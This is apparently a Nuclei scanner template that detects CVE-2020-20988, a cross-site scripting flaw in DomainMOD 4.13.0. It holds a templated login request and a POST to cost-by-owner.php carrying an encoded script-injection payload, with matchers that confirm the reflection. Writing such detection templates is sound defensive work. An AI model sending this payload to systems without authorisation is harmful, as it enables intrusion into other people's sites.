56 lines
1.9 KiB
YAML
56 lines
1.9 KiB
YAML
id: CVE-2020-20988
|
|
|
|
info:
|
|
name: DomainMOD 4.13.0 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter.
|
|
remediation: |
|
|
Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
|
|
reference:
|
|
- https://mycvee.blogspot.com/p/xss2.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-20988
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2020-20988
|
|
cwe-id: CWE-79
|
|
epss-score: 0.0009
|
|
epss-percentile: 0.37934
|
|
cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: domainmod
|
|
product: domainmod
|
|
tags: cve,cve2020,domainmod,xss,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
new_username={{username}}&new_password={{password}}
|
|
- |
|
|
POST /reporting/domains/cost-by-owner.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
|
|
|
|
cookie-reuse: true
|
|
req-condition: true
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(header_2, "text/html")'
|
|
- 'contains(body_2, "value=\"\"/><script>alert(document.domain)</script>")'
|
|
- 'contains(body_2, "DomainMOD")'
|
|
condition: and
|
|
# digest: 490a00463044022013a908da4a7c4c3420b193a4dab759ebfb902132153f7973ec3b86a7dd9e079a0220487823f328e1a25fbc967e8b6a56c44d0f49a03440d5ee634d9ded0ad5ab6f56:922c64590222798bb761d5b6d8e72950 |